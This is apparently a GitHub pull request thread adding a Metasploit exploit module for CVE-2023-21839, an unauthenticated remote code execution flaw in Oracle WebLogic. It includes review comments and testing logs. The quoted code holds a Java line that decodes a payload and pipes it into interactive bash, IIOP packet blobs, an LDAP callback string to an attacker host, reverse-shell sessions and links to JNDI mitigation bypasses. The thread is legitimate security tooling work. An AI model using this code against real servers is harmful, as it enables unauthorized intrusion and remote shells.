CVE-2023-21839 - Oracle Weblogic PreAuth Remote Command Execution via ForeignOpaqueReference IIOP Deserialization
rapid7/metasploit-framework pull request #17946
Opened 2023-04-27 21:44 UTC by gwillcox-r7

This module exploits a preauth remote command execution vulnerability in Oracle Weblogic 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 prior to the Jan 2023 security updates.

It uses the original PoC from https://github.com/4ra1n/CVE-2023-21839 as a reference point due to its highly structured nature.

This is still a PoC in the works at the moment. Currently it will get an connection back to an LDAP server and then use that to load a remote class reference from a HTTP server we control, thereby allowing us to load an arbitrary class into the target server and execute it provided remote JNDI loads are allowed (will be the case on earlier JDKs but not necessarily later ones).

I still haven't quite worked out how to do the serving of the class over the HTTP server correctly yet.

Also broken is the `check` method, which needs more updates to use proper upper limits on the version numbers.

If you need this to work immediately for a pentest, then comment out all of the code related to HTTP server and the LDAP server and use the `BashCommand` option from https://github.com/ffadd/JNDIKit. For some reason the `SimpleCommand` doesn't work due to the command name `SimpleCommand` getting cut short in one of the responses. I'm unsure why this happens but given you could also just make it `SmplCommand` or something shorter for the command name, I'm not too concerned about this right now, but it is something to be aware of.

Mostly publishing this a bit early so people know its in the works and also to gather some feedback and opinions on how this last part of the exploit should be performed and if there are better ways of doing things that perhaps I'm not aware of.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/iiop/cve_2023_21839_weblogic_rce`
- [ ] `set SRVPORT XXX` for the port for LDAP server to listen on.
- [ ] `set SRVHOST XXX` for the IP for the LDAP server to listen on.
- [ ] `set RPORT XXX` <- Set the port for IIOP on the target Weblogic server. Should be 7001 by default.
- [ ] `set LDAP_OBJECT_REF XXXX` <- Optionally set this if your using a LDAP server where different URLs after the `/` correspond to different payloads, such as for JNDIKIT.
- [ ] `set HTTP_SRVPORT XXXX` <- Set the port for the HTTP server to listen on.
- [ ] `exploit`
- [ ] Document any issues, but keep in mind a lot of this is dealing with a proprietary protocol that we don't have a gem or similar for, so its likely that we will need improvement in error handling in a number of places 😄 

# Target
A target can be obtained from https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839 for testing purposes.

2023-05-17 20:33 UTC, gwillcox-r7 commented
This should almost be ready for review, just need to write up some documentation. There are a lot of things I had to work around here so this might take a bit of time, but hopefully should be up shortly.

2023-05-17 23:08 UTC, gwillcox-r7 commented
A quick note for the reviewer of this: I've tried to modularize as much as I can in this in the hopes that some stuff can be moved to a library later on. There are however some binary blobs that I legitimately have no idea what is going on there. There is the potential to go back and figure this out but I reckoned the time investment in this would be quite high so forgive the lack of information for those parts.

2023-05-17 23:16 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/iiop/cve_2023_21839_weblogic_rce.md
> +object's `getReferent()` method, which will make use of the `ForeignOpaqueReference` class's `remoteJNDIName` variable,
No getReferent is not a typo just in case anyone reviewing this is curious. That is legitimately how its spelled 😕

2023-05-17 23:17 UTC, gwillcox-r7 commented on data/exploits/CVE-2023-21839/PayloadRuns.java
> +}
Note for future travelers, this had to be compiled using JDK 8 for it to work on the target. Newer versions of JDK use some different byteclass version other than the expected 52.0 bytecode so they have newer features that the target might not be able to decode if its running an older Java version.

2023-05-17 23:30 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/iiop/cve_2023_21839_weblogic_rce.md
> +the `lookup()` function.
Might want to mention the current exploit only works on older JDKs, aka those that have not applied the mitigations mentioned at https://community.f5.com/t5/technical-articles/mitigating-new-gadget-leveraging-jndi-injection-into-remote-code/ta-p/282849 r.e the `trustURLCodebase` property.

According to that URL there is a bypass at https://gist.github.com/TheGrandPew/748ac740698511975eaeed5d77ecb2d9 which seems to bypass JNDI mitigations using `org.yaml.snakeyaml.Yaml`.

There are also more bypasses and more modern code at https://github.com/pimps/JNDI-Exploit-Kit which seems to suggest some more JNDI bypasses using Tomcat 8+ and Groovy, or Tomcat 8+ or SpringBoot 1.2.x+, so long as they are in the class path.

Might be an idea to update this to take those into account to affect more systems, but not necessarily a blocker right now.

2023-05-17 23:34 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/iiop/cve_2023_21839_weblogic_rce.md
> +the `lookup()` function.
Update https://www.veracode.com/blog/research/exploiting-jndi-injections-java is also worth a read if we want to go ahead and implement this, breaks it down a lot more cleanly.

2023-05-24 16:20 UTC, smcintyre-r7 requested changes

2023-05-24 16:20 UTC, smcintyre-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
RHOST should be wrapped in brackets when it's an IPv6 address.

2023-05-24 17:34 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +              'Platform' => 'unix',
Nice work! Will update this accordingly to reflect what you found and make sure that works on my end as well, thanks for calling this out!

2023-05-24 17:37 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    stub_data += "\x27ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@java_class_name}" # Not sure why the backtick is here but hey.
Thanks for identifying this, much appreciated. As for IPv6 addresses, I'm not too concerned about that right now given most targets are unlikely to be IPv6, but something to note that we may want to fix post landing this PR.

2023-05-24 17:54 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    reply_status_code = resolve_packet_wls_key_1[16..19].unpack('L>')&.dig(0)
Thanks, I thought the `>` would override hence why I used them but I see there are better alternatives here. I'll go ahead and update this since I wasn't sure about how to do it best so thanks for the clarification.

2023-05-24 18:00 UTC, gwillcox-r7 commented on data/exploits/CVE-2023-21839/PayloadRuns.java
> +            Runtime.getRuntime().exec("bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}");
Sure, makes sense. This was just taken from the public PoC, I imagine we can optimize it further.

2023-05-24 18:03 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    cleanup
Sounds good, I wasn't sure about the 8 second delay anyway, and that was some testing code, so I've removed this and moved the `cleanup_service` call to be inside `cleanup` now.

2023-05-24 18:10 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    reply_status_code = resolve_packet_wls_key_1[16..19].unpack('L>')&.dig(0)
Fixed in https://github.com/rapid7/metasploit-framework/pull/17946/commits/89ef48148e34474f24135eb0d0edaf5777f2075c

2023-05-24 18:10 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    cleanup
Fixed in https://github.com/rapid7/metasploit-framework/pull/17946/commits/89ef48148e34474f24135eb0d0edaf5777f2075c with suggested fix.

2023-05-24 18:11 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +              'Platform' => 'unix',
Fixed in https://github.com/rapid7/metasploit-framework/pull/17946/commits/89ef48148e34474f24135eb0d0edaf5777f2075c

2023-05-24 18:23 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +              'Platform' => 'unix',
With rebase confirmed this is now working.

2023-05-24 19:12 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    stub_data += "\x27ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@java_class_name}" # Not sure why the backtick is here but hey.
Fixed using recommended fix with https://github.com/rapid7/metasploit-framework/commit/89ef48148e34474f24135eb0d0edaf5777f2075c. As for IPv6 addresses, going to see if I can't fix that shortly.

2023-05-24 19:24 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
I think it would be good to make this a Rex-Socket function so give me a bit and I'm going to try make a new PR to add such functionality in over there.

2023-05-24 21:00 UTC, gwillcox-r7 commented on data/exploits/CVE-2023-21839/PayloadRuns.java
> +            Runtime.getRuntime().exec("bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}");
For some reason when testing this with your suggestion, this results in a error code of 2, aka SYSTEM_EXCEPTION, instead of the expected USER_EXCEPTION.

2023-05-24 22:18 UTC, gwillcox-r7 commented on data/exploits/CVE-2023-21839/PayloadRuns.java
> +            Runtime.getRuntime().exec("bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}");
For reasons I don't understand the above works but trying to adjust this to do it in a different way does not. It will not cause the server to stop or error but we won't get a shell.

2023-06-08 20:08 UTC, smcintyre-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    elsif @version.between?(Rex::Version.new('14.0.0.0.0'), Rex::Version.new('14.9999999.999999.999999.99999'))
Instead of checking with `#between?` and padding a whole bunch of nines, you can check if it's version 12.x with `version >= Rex::Version.new('12') && version < Rex::Version.new('13').

The version detection will check each of the place holders.

```
[1] pry(#<Msf::Modules::Exploit__Multi__Iiop__Cve_2023_21839_weblogic_rce::MetasploitModule>)> Rex::Version.new('12.9999999.999999.999999.99999') < Rex::Version.new('13')
=> true
```

```suggestion
    if @version >= Rex::Version.new('12') && @version < Rex::Version.new('13'))
      wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49" \
                  "\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
                  "\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x02\x38\x00\x00\x00\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
                  "\x00\x00\x00\x00\x00\x00\x00{{key1}}"
      wls_key_2 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49" \
                  "\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
                  "\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x04{{key3}}\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
                  "\x00\x00\x00\x00\x00\x00\x00{{key1}}"
    elsif @version >= Rex::Version.new('14') && @version < Rex::Version.new('15')
```

2023-06-08 21:27 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    if @version.blank?
This was a concern of mine as well but I'm not aware of how to check for this. Do we have a `Rex::Socket` function that will do this for you, as I couldn't find one when I searched?

2023-06-08 21:35 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    elsif @version.between?(Rex::Version.new('14.0.0.0.0'), Rex::Version.new('14.9999999.999999.999999.99999'))
The version checks are in here because if we implemented this, then 12.0.0.0.0 would be considered vulnerable, whereas in reality its not vulnerable, only versions 12.2.1.3.0 and later are vulnerable. If we were to do what you did then if they released 12.2.1.5.0 as a branch it would be considered vulnerable even though that is a new branch would not be affected by this vulnerability.

2023-06-09 15:09 UTC, smcintyre-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    if @version.blank?
This is the expression I've used in the past. It'll properly handle IPv4 and IPv6 addresses.

```
Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
```

There's no library function for it but a long term solution would be to implement the suggestion here https://github.com/rapid7/metasploit-framework/pull/18054#pullrequestreview-1455701866.

2023-06-09 16:28 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    elsif @version.between?(Rex::Version.new('14.0.0.0.0'), Rex::Version.new('14.9999999.999999.999999.99999'))
Woops good point I misread this code. Let me double check some things here and get this updated accordingly.

2023-06-09 17:27 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    elsif @version.between?(Rex::Version.new('14.0.0.0.0'), Rex::Version.new('14.9999999.999999.999999.99999'))
Added this in with https://github.com/rapid7/metasploit-framework/pull/17946/commits/694c1006e41d90812f11c387fadc3707c8356521

2023-06-09 17:27 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    if @version.blank?
Added suggest changed in with https://github.com/rapid7/metasploit-framework/pull/17946/commits/694c1006e41d90812f11c387fadc3707c8356521

2023-06-09 17:28 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
Used the new functionality added into rex-socket to address this in https://github.com/rapid7/metasploit-framework/pull/17946/commits/694c1006e41d90812f11c387fadc3707c8356521

2023-06-09 17:28 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}/"
Fixed in https://github.com/rapid7/metasploit-framework/pull/17946/commits/694c1006e41d90812f11c387fadc3707c8356521 by using the new rex-socket function.

2023-06-09 17:28 UTC, gwillcox-r7 commented on modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
> +    stub_data += "\x27ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@java_class_name}" # Not sure why the backtick is here but hey.
Fixed IPv6 issue in https://github.com/rapid7/metasploit-framework/pull/17946/commits/694c1006e41d90812f11c387fadc3707c8356521 by using the new rex-socket function.

2023-06-09 18:55 UTC, smcintyre-r7 approved these changes
Changes look good to me now. I tested a couple of payloads. I confirmed that the adapted Python payload is failing because `which` is unavailable in the docker system. Not sure I've seen that before, but it's unrelated to the exploit here.

<details>
<summary>Testing Output</summary>

```
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
                                                  
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::##############                              :::::::::::::::::::
############################  ##############################  :::::::::::::::::
#########################  ######???????????????????????######  :::::::::::::::
=========================  ####??????????()????()?????????####  :::::::::::::::
=========================  ##????()??????????????    ()?????##  ::::    :::::::
------------=============  ##??????????????????  ;;;;  ?????##  ::  ;;;;  :::::
-------------------------  ##??????????()??????  ;;;;;;?????##    ;;;;;;  :::::
-------------------------  ##??????????????????  ;;;;;;         ;;;;;;;;  :::::
++++++++++++-------------  ##??????????????????  ;;;;;;;;;;;;;;;;;;;;;;;  :::::
+++++++++++++++++++++++++  ##????????????()??  ;;;;;;;;;;;;;;;;;;;;;;;;;;;  :::
+++++++++++++++++++++++++  ##??()????????????  ;;;;;;@@  ;;;;;;;;@@  ;;;;;  :::
%%%%%%%%%%%%%++++    ;;;;  ##????????????????  ;;;;;;    ;;;  ;;;    ;;;;;  :::
%%%%%%%%%%%%%%%%%;;;;;;;;  ####??????()??????  ;;[];;;;;;;;;;;;;;;;;;;;;[]  :::
$$$$$$$$$$$$$%%  ;; %%%%%  ######?????????????  ;;;;;;              ;;;;  :::::
$$$$$$$$$$$$$$$$$  $$$$$$    ###################  ;;;;;;;;;;;;;;;;;;;;  :::::::
$$$$$$$$$$$$$$$$$$$$$$$  ;;;;                                       :::::::::::
:::::::::::::$$$$$$$$$$  ;;;;  ::  ;;  ::::::::::::  ;;  ::  ;;;;  ::::::::::::
:::::::::::::::::::::::      ::::::    :::::::::::::     ::::      ::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::NN::::NN::YY::::YY:::AAAAAA:::NN::::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN::::YYYY::::AAAAAAAA::NN::NNNN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN:::::YY:::::AA::::AA::NN::NNNN:::::::::::::::::::::::::
::::::::::::::::NN::::NN:::::YY:::::AA::::AA::NN::::NN:::!!::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::YOU HAVE DONE THE NYAN FOR 31337 SECONDS!:::::::::::::::::::::


       =[ metasploit v6.3.18-dev-694c1006e4               ]
+ -- --=[ 2319 exploits - 1209 auxiliary - 414 post       ]
+ -- --=[ 1233 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can upgrade a shell to a Meterpreter 
session on many platforms using sessions -u 
<session_id>
Metasploit Documentation: https://docs.metasploit.com/

[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> load krb_debug
[*] The kerberos debuggin plugin has been loaded.
[*] Successfully loaded plugin: Kerberos Debug
resource (/home/smcintyre/.msf4/msfconsole.rc)> load request
[*] Successfully loaded plugin: Request
resource (/home/smcintyre/.msf4/msfconsole.rc)> load versions
[*] Successfully loaded plugin: Versions
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
msf6 exploit(windows/smb/psexec) > use exploit/multi/iiop/cve_2023_21839_weblogic_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > show options 

Module options (exploit/multi/iiop/cve_2023_21839_weblogic_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HTTP_SRVPORT  8080             yes       The HTTP server port
   LDIF_FILE                      no        Directory LDIF file path
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         7001             yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       389              yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux



View the full module info with the info, or info -d command.

msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 127.0.0.1:7001 - Running automatic check ("set AutoCheck false" to disable)
[-] 127.0.0.1:7001 - Exploit aborted due to failure: unexpected-reply: Could not get the version information from the Weblogic login page
[*] Exploit completed, but no session was created.
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > check
[+] 127.0.0.1:7001 - The target is vulnerable. Target is a Oracle WebServer 12.2.1.3 server, and is vulnerable!
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > git show
[*] exec: git show

commit 694c1006e41d90812f11c387fadc3707c8356521 (HEAD -> pr/17946)
Author: Grant Willcox <gwillcox@rapid7.com>
Date:   Fri Jun 9 12:24:35 2023 -0500

    Add more IPv6 support in to the module

diff --git a/Gemfile.lock b/Gemfile.lock
index e7dfd60835..6acb2795da 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -384,7 +384,7 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.51)
+    rex-socket (0.1.52)
       rex-core
     rex-sslscan (0.1.9)
       rex-core
diff --git a/lib/msf/core/exploit/remote/jndi_injection.rb b/lib/msf/core/exploit/remote/jndi_injection.rb
index 468b9c5276..843cac6829 100644
--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -29,7 +29,7 @@ module Exploit::Remote::JndiInjection
   # @return [String] the JNDI string
   def jndi_string(resource = nil)
     resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > 
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 127.0.0.1:7001 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:7001 - The target is vulnerable. Target is a Oracle WebServer 12.2.1.3 server, and is vulnerable!
[-] 127.0.0.1:7001 - Exploit aborted due to failure: bad-config: SRVHOST must be set to a routable address!
[*] Exploit completed, but no session was created.
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 exploit(multi/iiop/cve_2023_21839_weblogic_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 127.0.0.1:7001 - Running automatic check ("set AutoCheck false" to disable) [...]

2023-06-09 18:56 UTC, merged

2023-06-09 18:56 UTC, smcintyre-r7 commented
# Release Notes

This adds an exploit for CVE-2023-21839 which is an unauthenticated RCE in Oracle Weblogic.

2023-06-09 19:50 UTC, gwillcox-r7 commented
Thanks @smcintyre-r7 appreciate your help and review on this one!

2023-12-04 20:34 UTC, aquinn-r7 commented
I'm getting a SYSTEM_EXCEPTION error (Denoted as 'Target responded with 2') while performing the exploit on a vulnerable hosts.  Looking into reasons for this, but I'm unsure as to the reason why this may be occurring.

![image](https://github.com/rapid7/metasploit-framework/assets/121982963/ee4e4d8a-8f20-4e4f-8400-5758214df5ca)